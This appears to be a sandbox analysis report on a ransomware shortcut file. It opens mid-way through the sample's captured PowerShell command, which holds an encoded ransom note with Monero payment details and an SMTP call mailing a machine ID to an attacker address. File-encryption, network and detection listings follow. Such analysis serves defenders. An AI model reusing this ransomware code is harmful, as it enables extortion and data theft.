W4gcmVjb3ZlciBhbGwgeW91ciBmaWxlcyBzYWZlbHkgYW5kIGVhc2lseS4gQnV0IHlvdSBoYXZlIG5vdCBzbyBlbm91Z2ggdGltZS4gSWYgeW91IHdhbnQgdG8gZGVjcnlwdCBhbGwgeW91ciBmaWxlcywgeW91IG5lZWQgdG8gcGF5LjwvcD48cD5Zb3Ugb25seSBoYXZlIDIgZGF5cyB0byBzdWJtaXQgdGhlIHBheW1lbnQuIEFmdGVyIHRoYXQgdGhlIHByaWNlIHdpbGwgYmUgZG91YmxlZC4gPHN0cm9uZz5BbHNvLCBpZiB5b3UgZG9uJ3QgcGF5IGluIDUgZGF5cywgd2Ugd2lsbCBkaXNjbG9zZSB0aGUgcHJpdmF0ZSBkYXRhIHRvIHlvdXIgY29udGFjdHMsIGFuZCB5b3Ugd29uJ3QgYmUgYWJsZSB0byByZWNvdmVyIHlvdXIgZmlsZXMgZm9yZXZlci48L3N0cm9uZz48L3A+PC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0nc2VjdGlvbic+PGRpdiBjbGFzcz0nc2VjdGlvbi10aXRsZSc+My4gV2hhdCBhYm91dCBndWFyYW50ZWVzPzwvZGl2PjxkaXYgY2xhc3M9J3NlY3Rpb24tY29udGVudCc+PHA+SXRzIGp1c3QgYSBidXNpbmVzcy4gV2UgYWJzb2x1dGVseSBkbyBub3QgY2FyZSBhYm91dCB5b3UgYW5kIHlvdXIgZGVhbHMsIGV4Y2VwdCBnZXR0aW5nIGJlbmVmaXRzLiBJZiB3ZSBkbyBub3QgZG8gb3VyIHdvcmsgYW5kIGxpYWJpbGl0aWVzIC0gbm9ib2R5IHdpbGwgY29vcGVyYXRlIHdpdGggdXMuIEl0cyBub3QgaW4gb3VyIGludGVyZXN0cy48L3A+PC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0nc2VjdGlvbic+PGRpdiBjbGFzcz0nc2VjdGlvbi10aXRsZSc+NC4gSG93IERvIEkgUGF5PzwvZGl2PjxkaXYgY2xhc3M9J3NlY3Rpb24tY29udGVudCc+PHA+UGF5bWVudCBpcyBhY2NlcHRlZCBpbiBNb25lcm8gKFhNUikgb25seS4gRm9yIG1vcmUgaW5mb3JtYXRpb24sIGNsaWNrIDxhIGhyZWY9J2h0dHBzOi8vd3d3LmdldG1vbmVyby5vcmcvJz5BYm91dCBNb25lcm88L2E+LiBQbGVhc2UgY2hlY2sgdGhlIGN1cnJlbnQgcHJpY2Ugb2YgTW9uZXJvIGFuZCBzZW5kIHRoZSBjb3JyZWN0IGFtb3VudC4gRm9yIG1vcmUgaW5mb3JtYXRpb24sIGNsaWNrIDxhIGhyZWY9J2h0dHBzOi8vd3d3LmtyYWtlbi5jb20vbGVhcm4vYnV5LW1vbmVyby14bXInPkhvdyB0byBidXkgTW9uZXJvPC9hPi4gT25jZSB0aGUgcGF5bWVudCBpcyBjaGVja2VkLCB3ZSBndWFyYW50ZWUgdGhhdCB5b3Ugd2lsbCBpbW1lZGlhdGVseSByZWNlaXZlIHRoZSBrZXkgYW5kIGNhbiBkZWNyeXB0IHlvdXIgZmlsZXMuPC9wPjxkaXYgY2xhc3M9J21vbmVyby1hZGRyZXNzJz48ZGl2IGNsYXNzPSdhZGRyZXNzLWxhYmVsJz5TZW5kICQ1MDAgd29ydGggb2YgTW9uZXJvIHRvIHRoaXMgYWRkcmVzczo8L2Rpdj48ZGl2IGNsYXNzPSdhZGRyZXNzLWJveCc+PGlucHV0IGNsYXNzPSdhZGRyZXNzLWlucHV0JyByZWFkb25seT0nJyB0eXBlPSd0ZXh0JyB2YWx1ZT0nOEJFTXBDdVNMNWFCRjVyRzFhOVVORmdCY1BVMTZlTlVYYlhEQnpRSnFEM0U0amRKYVVoQXczTENWSDNGNGdQVXlzaW9ZcmpzUE1hMzQ0N29Mb1N1QWhVckg3RVF0Q0MnLz48YnV0dG9uIGNsYXNzPSdjb3B5LWJ0bic+Q29weTwvYnV0dG9uPjwvZGl2PjwvZGl2PjxwPkFmdGVyIHlvdXIgcGF5bWVudCwgeW91IGNhbiBmaW5kICdUcmFuc2FjdGlvbiBJRCcgYW5kICdUcmFuc2FjdGlvbiBLZXknIG9uIHRoZSB0cmFuc2ZlcnMgcGFnZS4gVGhlc2UgSURzIGFyZSBnZW5lcmF0ZWQgdG8gcHJvdmUgdGhlIHZhbGlkaXR5IG9mIHRoZSB0cmFuc2FjdGlvbi4gUGxlYXNlIGZpbGwgaW4gdGhlIGJveGVzIGJlbG93IGFuZCBjbGljayB0aGUgW0dlbmVyYXRlIE1hY2hpbmUgSURdIGJ1dHRvbi48L3A+PGRpdiBjbGFzcz0nbW9uZXJvLWFkZHJlc3MnPjxkaXYgY2xhc3M9J2FkZHJlc3MtbGFiZWwnPlRyYW5zYWN0aW9uIElEOjwvZGl2PjxkaXYgY2xhc3M9J2FkZHJlc3MtYm94Jz48aW5wdXQgY2xhc3M9J2FkZHJlc3MtaW5wdXQnIGlkPSdUeG5JRCcgdHlwZT0ndGV4dCcvPjwvZGl2PjxkaXYgY2xhc3M9J2FkZHJlc3MtbGFiZWwnPlRyYW5zYWN0aW9uIEtleTo8L2Rpdj48ZGl2IGNsYXNzPSdhZGRyZXNzLWJveCc+PGlucHV0IGNsYXNzPSdhZGRyZXNzLWlucHV0JyBpZD0nVHhuS2V5JyB0eXBlPSd0ZXh0Jy8+PC9kaXY+PGJ1dHRvbiBjbGFzcz0nZ2VuZXJhdGUtYnRuJyBvbmNsaWNrPSdzYXZlTWFjaGluZUlEKCknPkdlbmVyYXRlIE1hY2hpbmUgSUQ8L2J1dHRvbj48L2Rpdj48cD48c3Ryb25nPlRoaXMgd2lsbCBnZW5lcmF0ZSBhIE1hY2hpbmUgSUQgZmlsZSB0aGF0IG5lZWRzIHRvIGJlIHNlbnQgYWxvbmcgdG8gdXMgaW4gb3JkZXIgdG8gZGVjcnlwdCBmaWxlcy48L3N0cm9uZz48L3A+PC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0nc2VjdGlvbic+PGRpdiBjbGFzcz0nc2VjdGlvbi10aXRsZSc+NS4gSG93IHdpbGwgdGhlIGRlY3J5cHRpb24gcHJvY2VzcyBwcm9jZWVkIGFmdGVyIHBheW1lbnQ/PC9kaXY+PGRpdiBjbGFzcz0nc2VjdGlvbi1jb250ZW50Jz48cD5BZnRlciBwYXltZW50IHdlIHdpbGwgc2VuZCB0byB5b3Ugb3VyIHNjYW5uZXItZGVjb2RlciBwcm9ncmFtIGFuZCBkZXRhaWxlZCBpbnN0cnVjdGlvbnMgZm9yIHVzZS4gV2l0aCB0aGlzIHByb2dyYW0geW91IHdpbGwgYmUgYWJsZSB0byBkZWNyeXB0IGFsbCB5b3VyIGVuY3J5cHRlZCBmaWxlcy48L3A+PC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0nc2VjdGlvbic+PGRpdiBjbGFzcz0nc2VjdGlvbi10aXRsZSc+Ni4gSG93IHRvIGNvbnRhY3Qgd2l0aCB5b3U/PC9kaXY+PGRpdiBjbGFzcz0nc2VjdGlvbi1jb250ZW50Jz48cD5Zb3UgY2FuIGNvbnRhY3QgdXMgdmlhIG1haWxib3ggb3IgVE9YLiBJZiB5b3UgZG9uJ3Qga25vdyBhYm91dCBUT1gsIGdvIHRvIDxhIGhyZWY9J2h0dHBzOi8vdG94LmNoYXQnPmh0dHBzOi8vdG94LmNoYXQuPC9hPjwvcD48cD48c3Ryb25nPkZpbmFsbHksIHRydXN0IHRoYXQgd2UgYXJlIGEgcmVwdXRhYmxlIGdyb3VwLiBXZSBwcm9taXNlIHRoYXQgeW91IGNhbiByZWNvdmVyIGFsbCB5b3VyIGZpbGVzIGFmdGVyIHRoZSBwYXltZW50Ljwvc3Ryb25nPjwvcD48L2Rpdj48L2Rpdj48ZGl2IGNsYXNzPSdjb250YWN0LWFkZHJlc3MnPjxkaXYgY2xhc3M9J2NvbnRhY3QtbGFiZWwnPkVtYWlsIEFkZHJlc3M6PC9kaXY+PGRpdiBjbGFzcz0nYWRkcmVzcy1ib3gnPjxpbnB1dCBjbGFzcz0nYWRkcmVzcy1pbnB1dCcgcmVhZG9ubHk9JycgdHlwZT0ndGV4dCcgdmFsdWU9J2tpdDgyODBAcHVua3Byb29mLmNvbScvPjxidXR0b24gY2xhc3M9J2NvcHktYnRuJz5Db3B5PC9idXR0b24+PC9kaXY+PGRpdiBjbGFzcz0nY29udGFjdC1sYWJlbCc+VG94IElEOjwvZGl2PjxkaXYgY2xhc3M9J2FkZHJlc3MtYm94Jz48aW5wdXQgY2xhc3M9J2FkZHJlc3MtaW5wdXQnIHJlYWRvbmx5PScnIHR5cGU9J3RleHQnIHZhbHVlPSdENkRBQkREOTYwMEM5QzU0ODFFRDQxMjcwNzE1MDlEMjg3REQ1MzlGQjM2RjBCQzgyRDRGQTBGMDgwMEFGOTcwOTIzQjU1MDAwNjREJy8+PGJ1dHRvbiBjbGFzcz0nY29weS1idG4nPkNvcHk8L2J1dHRvbj48L2Rpdj48L2Rpdj48L2Rpdj48ZGl2IGNsYXNzPSdmb290ZXInPsKpIDIwMjUgRmlsZSBEZWNyeXB0b3IgU2VydmljZS4gQWxsIHJpZ2h0cyByZXNlcnZlZC4gRGVjcnlwdGlvbiBrZXlzIGFyZSBzZWN1cmVseSBzdG9yZWQgb24gb3VyIHNlcnZlcnMuICAgICAgICA8L2Rpdj4=\";$j=\"ZnVuY3Rpb24gc3RhcnRDb3VudGRvd24oKXtjb25zdCBwYXltZW50VGltZXIgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgncGF5bWVudFRpbWVyJyk7Y29uc3QgZmlsZVRpbWVyID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2ZpbGVUaW1lcicpO2NvbnN0IHBheW1lbnREdWUgPSBuZXcgRGF0ZShlRGF0YSk7cGF5bWVudER1ZS5zZXREYXRlKHBheW1lbnREdWUuZ2V0RGF0ZSgpKyAyKTtjb25zdCBmaWxlTG9zdCA9IG5ldyBEYXRlKGVEYXRhKTtmaWxlTG9zdC5zZXREYXRlKGZpbGVMb3N0LmdldERhdGUoKSsgNSk7ZnVuY3Rpb24gdXBkYXRlVGltZXJzKCl7Y29uc3Qgbm93ID0gbmV3IERhdGUoKTtsZXQgcGF5bWVudERpZmYgPSBwYXltZW50RHVlIC0gbm93O2lmIChwYXltZW50RGlmZiA8PSAwKXtwYXltZW50VGltZXIudGV4dENvbnRlbnQgPSAnMDA6MDA6MDAnO31lbHNlIHtjb25zdCBwYXltZW50SG91cnMgPSBNYXRoLmZsb29yKHBheW1lbnREaWZmIC8gKDEwMDAgKiA2MCAqIDYwKSk7cGF5bWVudERpZmYgJT0gKDEwMDAgKiA2MCAqIDYwKTtjb25zdCBwYXltZW50TWludXRlcyA9IE1hdGguZmxvb3IocGF5bWVudERpZmYgLyAoMTAwMCAqIDYwKSk7cGF5bWVudERpZmYgJT0gKDEwMDAgKiA2MCk7Y29uc3QgcGF5bWVudFNlY29uZHMgPSBNYXRoLmZsb29yKHBheW1lbnREaWZmIC8gMTAwMCk7cGF5bWVudFRpbWVyLnRleHRDb250ZW50ID0gcGF5bWVudEhvdXJzLnRvU3RyaW5nKCkucGFkU3RhcnQoMiwnMCcpKyc6JytwYXltZW50TWludXRlcy50b1N0cmluZygpLnBhZFN0YXJ0KDIsJzAnKSsnOicrcGF5bWVudFNlY29uZHMudG9TdHJpbmcoKS5wYWRTdGFydCgyLCcwJyk7fWxldCBmaWxlRGlmZiA9IGZpbGVMb3N0IC0gbm93O2lmIChmaWxlRGlmZiA8PSAwKXtmaWxlVGltZXIudGV4dENvbnRlbnQgPSAnMDA6MDA6MDAnO31lbHNlIHtjb25zdCBmaWxlSG91cnMgPSBNYXRoLmZsb29yKGZpbGVEaWZmIC8gKDEwMDAgKiA2MCAqIDYwKSk7ZmlsZURpZmYgJT0gKDEwMDAgKiA2MCAqIDYwKTtjb25zdCBmaWxlTWludXRlcyA9IE1hdGguZmxvb3IoZmlsZURpZmYgLyAoMTAwMCAqIDYwKSk7ZmlsZURpZmYgJT0gKDEwMDAgKiA2MCk7Y29uc3QgZmlsZVNlY29uZHMgPSBNYXRoLmZsb29yKGZpbGVEaWZmIC8gMTAwMCk7ZmlsZVRpbWVyLnRleHRDb250ZW50ID0gZmlsZUhvdXJzLnRvU3RyaW5nKCkucGFkU3RhcnQoMiwnMCcpKyc6JytmaWxlTWludXRlcy50b1N0cmluZygpLnBhZFN0YXJ0KDIsJzAnKSsnOicrZmlsZVNlY29uZHMudG9TdHJpbmcoKS5wYWRTdGFydCgyLCcwJyk7fX11cGRhdGVUaW1lcnMoKTtzZXRJbnRlcnZhbCh1cGRhdGVUaW1lcnMsIDEwMDApO31mdW5jdGlvbiBzYXZlTWFjaGluZUlEKCl7Y29uc3QgVHhuSUQgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnVHhuSUQnKS52YWx1ZS50cmltKCk7Y29uc3QgVHhuS2V5ID0gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ1R4bktleScpLnZhbHVlLnRyaW0oKTtjb25zdCBNSUQgPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnZGF0YScpLmRhdGFzZXQucGF5bG9hZDtpZiAoVHhuSUQubGVuZ3RoIT09NjQpe2FsZXJ0KCdJbnZhbGlkIFRyYW5zYWN0aW9uIElEJyk7cmV0dXJuO31pZiAoVHhuS2V5Lmxlbmd0aCE9PTY0KXthbGVydCgnSW52YWxpZCBUcmFuc2FjdGlvbiBLZXknKTtyZXR1cm47fWNvbnN0IGNvbWIgPSBUeG5JRCtUeG5LZXkrTUlEO2NvbnN0IGJsb2IgPSBuZXcgQmxvYihbY29tYl0sIHt0eXBlOid0ZXh0L3BsYWluO2NoYXJzZXQ9dXRmLTgnfSk7Y29uc3QgZmlsZU5hbWUgPSAnWW91cl9NYWNoaW5lX0lELnR4dCc7Y29uc3QgdXJsID0gVVJMLmNyZWF0ZU9iamVjdFVSTChibG9iKTtjb25zdCBhID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnYScpO2EuaHJlZiA9IHVybDthLmRvd25sb2FkID0gZmlsZU5hbWU7YS5zdHlsZS5kaXNwbGF5ID0gJ25vbmUnO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7YS5jbGljaygpO31kb2N1bWVudC5xdWVyeVNlbGVjdG9yQWxsKCcuY29weS1idG4nKS5mb3JFYWNoKGJ1dHRvbiA9PntidXR0b24uYWRkRXZlbnRMaXN0ZW5lcignY2xpY2snLCBhc3luYyBmdW5jdGlvbigpe2NvbnN0IGlucHV0ID0gdGhpcy5wYXJlbnROb2RlLnF1ZXJ5U2VsZWN0b3IoJy5hZGRyZXNzLWlucHV0Jyk7dHJ5IHthd2FpdCBuYXZpZ2F0b3IuY2xpcGJvYXJkLndyaXRlVGV4dChpbnB1dC52YWx1ZSk7Y29uc3Qgb3JpZ2luYWxUZXh0ID0gdGhpcy50ZXh0Q29udGVudDt0aGlzLnRleHRDb250ZW50ID0gJ0NvcGllZCEnO3NldFRpbWVvdXQoKCk9Pnt0aGlzLnRleHRDb250ZW50ID0gb3JpZ2luYWxUZXh0O30sIDIwMDApO31jYXRjaCAoZXJyKXtjb25zb2xlLmVycm9yKCdDb3B5IGZhaWw6JywgZXJyKTt9fSk7fSk7d2luZG93Lm9ubG9hZCA9IHN0YXJ0Q291bnRkb3duOzwvc2NyaXB0PjwvYm9keT48L2h0bWw+\";$b=[System.Convert]::FromBase64String($i);$c=[System.Convert]::FromBase64String($j);$t=[System.Text.Encoding]::UTF8.GetString($b);$u=[System.Text.Encoding]::UTF8.GetString($c);$w=\"<div data-payload='\"+[System.Convert]::ToBase64String($VhBppDOc99)+\"' id='data'></div></div><script>const eData = new Date(\"+[System.BitConverter]::ToInt64($CYwQwYHI99,0).ToString()+\"*1000);\";$v=$t+$w+$u;Set-Content -Path $h -Value $v -Encoding UTF8 -Force;}}seNd-mAiLMeSsAGe -sMtPseRver \"in.mail.tm\" -pORt 25 -From \"test@test.com\" -To \"244zita@mechanicspedia.com\" -suBjEct \"MachineID\" -boDy $w"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

Add for printing

Total events

6 572

Read events

6 571

Write events

Delete events

Modification events


(PID) Process:	(8820) powershell.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.txt\OpenWithProgids
Operation:	write	Name:	txtfile
Value:

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
8820	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KIX7OOOEO8H865NN0PUF.temp		binary
		MD5:49B2F1CC660011005714BCD04B03AD0B	SHA256:6088DCDC9F1866BCAE0EE662BFEA1B536F525E8CF25FAC5BC852EAC1D9718154
8820	powershell.exe	C:\Users\admin\Downloads\Project_Workshop_7th_Minutes.txt		text
		MD5:1BD729D55909A5DC95700861F0A25A3C	SHA256:F23CFE7CEB98BE8521A7841C37858EBF5E4B3D6300CD692C9B63DD3DBF6DFAD4
8820	powershell.exe	C:\Users\admin\Desktop\activitywireless.rtf.ENCRYPT		binary
		MD5:52904A1C84CCD7E15DB75CB098AE37E1	SHA256:F41E3FFF2A59AC52FA271708B5C1B471EAE1D5580FDB3B81C19BFEF636681CEF
8820	powershell.exe	C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b589e95a30cbf8b3.customDestinations-ms		binary
		MD5:49B2F1CC660011005714BCD04B03AD0B	SHA256:6088DCDC9F1866BCAE0EE662BFEA1B536F525E8CF25FAC5BC852EAC1D9718154
8820	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ph1r50pf.fg4.psm1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8820	powershell.exe	C:\Users\admin\Desktop\activitywireless.rtf		binary
		MD5:52904A1C84CCD7E15DB75CB098AE37E1	SHA256:F41E3FFF2A59AC52FA271708B5C1B471EAE1D5580FDB3B81C19BFEF636681CEF
8820	powershell.exe	C:\Users\admin\Desktop\connectionquality.jpg.ENCRYPT		binary
		MD5:8BB8549E81D81EC68DB392AE9CB4C866	SHA256:6101DC3FA7099B84B87624E3F517CDBA82A74E21C42757C55C1888A924CF08C2
8820	powershell.exe	C:\Users\admin\Desktop\componentscells.rtf.ENCRYPT		binary
		MD5:49806AE6BD3B551628A43F27892EFAD6	SHA256:CCAE78E69543953DA81902D4AE0FA815CD028A341376CE0BBCEF7159FA5698C9
8820	powershell.exe	C:\Users\admin\Desktop\theseloss.jpg.ENCRYPT		binary
		MD5:7F7481313D6E8997920769C693FCADA5	SHA256:C481B896710363D63160724F589006775DA71A1AE9761EAFF0F56A1D20F35EB3
8820	powershell.exe	C:\Users\admin\Desktop\theseloss.jpg		binary
		MD5:7F7481313D6E8997920769C693FCADA5	SHA256:C481B896710363D63160724F589006775DA71A1AE9761EAFF0F56A1D20F35EB3

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
6768	MoUsoCoreWorker.exe	GET	304	4.231.128.59:443	https://settings-win.data.microsoft.com/settings/v3.0/OneSettings/Client?OSVersionFull=10.0.19045.4046.amd64fre.vb_release.191206-1406&LocalDeviceID=s%3ABAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&FlightRing=Retail&AttrDataVer=186&OSUILocale=en-US&OSSkuId=48&App=WOSC&AppVer=&IsFlightingEnabled=0&TelemetryLevel=1&DeviceFamily=Windows.Desktop	unknown	—	—	whitelisted
4468	svchost.exe	GET	304	4.231.128.59:443	https://settings-win.data.microsoft.com/settings/v3.0/WSD/UpdateHealthTools?os=Windows&osVer=10.0.19041.1.amd64fre.vb_release.191206-&sku=48&deviceClass=Windows.Desktop&locale=en-US&deviceId=s:BAD99146-31D3-4EC6-A1A4-BE76F32BA5D4&sampleId=s:95271487&appVer=10.0.19041.3626&FlightRing=Retail&TelemetryLevel=1&HidOverGattReg=C%3A%5CWINDOWS%5CSystem32%5CDriverStore%5CFileRepository%5Chidbthle.inf_amd64_9610b4821fdf82a5%5CMicrosoft.Bluetooth.Profiles.HidOverGatt.dll&AppVer=&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&OEMModel=DELL&UpdateOfferedDays=4294967295&ProcessorManufacturer=AuthenticAMD&InstallDate=1661339444&OEMModelBaseBoard=&BranchReadinessLevel=CB&OEMSubModel=J5CR&IsCloudDomainJoined=0&DeferFeatureUpdatePeriodInDays=30&IsDeviceRetailDemo=0&FlightingBranchName=&OSUILocale=en-US&DeviceFamily=Windows.Desktop&WuClientVer=10.0.19041.3996&UninstallActive=1&IsFlightingEnabled=0&OSSkuId=48&ProcessorClockSpeed=3094&TotalPhysicalRAM=6144&SecureBootCapable=0&App=SedimentPack&ProcessorCores=6&CurrentBranch=vb_release&InstallLanguage=en-US&DeferQualityUpdatePeriodInDays=0&OEMName_Uncleaned=DELL&TPMVersion=0&PrimaryDiskTotalCapacity=262144&InstallationType=Client&AttrDataVer=186&ProcessorModel=AMD%20Ryzen%205%203500%206-Core%20Processor&IsEdgeWithChromiumInstalled=1&OSVersion=10.0.19045.4046&IsMDMEnrolled=0&ActivationChannel=Retail&FirmwareVersion=A.40&TrendInstalledKey=1&OSArchitecture=AMD64&DefaultUserRegion=244&UpdateManagementGroup=2	unknown	—	—	whitelisted
6768	MoUsoCoreWorker.exe	GET	304	4.231.128.59:443	https://settings-win.data.microsoft.com/settings/v3.0/WaaS/FeatureManagement?IsCloudDomainJoined=0&ProcessorIdentifier=AMD64%20Family%2023%20Model%201%20Stepping%202&CurrentBranch=vb_release&AccountFirstChar=&ActivationChannel=Retail&OEMModel=DELL&FlightRing=Retail&AttrDataVer=186&InstallLanguage=en-US&OSUILocale=en-US&WebExperience=1&FlightingBranchName=&ChassisTypeId=1&OSSkuId=48&App=CDM&InstallDate=1661339444&AppVer=&OSArchitecture=AMD64&DefaultUserRegion=244&TelemetryLevel=1&OSVersion=10.0.19045.4046&DeviceFamily=Windows.Desktop	unknown	—	—	whitelisted
8228	SIHClient.exe	GET	304	74.178.240.61:443	https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL	unknown	—	—	whitelisted
8228	SIHClient.exe	GET	200	20.3.187.198:443	https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping	unknown	—	—	whitelisted
8228	SIHClient.exe	GET	200	74.178.240.61:443	https://slscr.update.microsoft.com/sls/ping	unknown	—	—	whitelisted
8228	SIHClient.exe	GET	304	74.178.240.61:443	https://slscr.update.microsoft.com/SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL	unknown	—	—	whitelisted
356	svchost.exe	GET	200	2.17.190.73:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
356	svchost.exe	POST	200	20.190.159.129:443	https://login.live.com/RST2.srf	unknown	xml	10.3 Kb	whitelisted
4468	svchost.exe	GET	200	23.216.77.6:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	192.168.100.255:137	—	Not routed	—	whitelisted
4468	svchost.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
2328	RUXIMICS.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
6768	MoUsoCoreWorker.exe	51.104.136.2:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
4	System	192.168.100.255:138	—	Not routed	—	whitelisted
3412	svchost.exe	172.211.123.249:443	client.wns.windows.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
8820	powershell.exe	49.12.18.190:25	in.mail.tm	HETZNER-AS	DE	unknown
356	svchost.exe	20.190.159.129:443	login.live.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted
356	svchost.exe	2.17.190.73:80	ocsp.digicert.com	AKAMAI-AS	US	whitelisted
4468	svchost.exe	4.231.128.59:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	US	whitelisted

DNS requests

Domain	IP	Reputation
settings-win.data.microsoft.com	51.104.136.2 4.231.128.59	whitelisted
self.events.data.microsoft.com	20.42.65.88	whitelisted
google.com	216.58.206.78	whitelisted
client.wns.windows.com	172.211.123.249	whitelisted
in.mail.tm	49.12.18.190	unknown
login.live.com	20.190.159.129 20.190.159.0 40.126.31.130 20.190.159.71 20.190.159.130 40.126.31.73 40.126.31.69 40.126.31.2	whitelisted
ocsp.digicert.com	2.17.190.73	whitelisted
crl.microsoft.com	23.216.77.6 23.216.77.21 23.216.77.18 23.216.77.36 23.216.77.28 23.216.77.41 23.216.77.30 23.216.77.20 23.216.77.15	whitelisted
slscr.update.microsoft.com	74.178.240.61	whitelisted
www.microsoft.com	23.52.181.212	whitelisted

Threats

PID	Process	Class	Message
4468	svchost.exe	Unknown Traffic	ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)

Add for printing

No debug info

General Info

Project_Workshop_7th_Minutes.txt.lnk

F1DCDA3C34143478344498DA8462F2B2

3DBB3585D48C73C5B078834BFCFE06CDC88DA26C

6F6F6F5A61AD1E5DF0626D058EBF456FFAE3FF9F71907C023F21EBF23A6E0914

768:RIku18ju3XHu0HrcBsri4W38Ih0/Z3QHe/xGvqZS4up:Geu3edWIUd+

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Executes powershell commands (LNK)

CRYPTOWALL has been found (auto)

Bypass execution policy to execute commands

Uses AES cipher (POWERSHELL)

Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

Renames files like ransomware

CRYPTOWALL note has been found

SUSPICIOUS

Renames file via Powershell

Starts process via Powershell

Manipulates environment variables

Returns all items found within a container (POWERSHELL)

Cryptography encrypted command line is found

Escape characters obfuscation (POWERSHELL)

Uses base64 encoding (POWERSHELL)

Connects to SMTP port

Writes data into a file (POWERSHELL)

INFO

Drops script file

Reads security settings of Internet Explorer

Reads Microsoft Office registry keys

Returns hidden items found within a container (POWERSHELL)

Create files in a temporary directory

Script raised an exception (POWERSHELL)

Gets data length (POWERSHELL)

Failed to connect to remote server (POWERSHELL)

Malware configuration

Static information

TRiD

EXIF

LNK

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings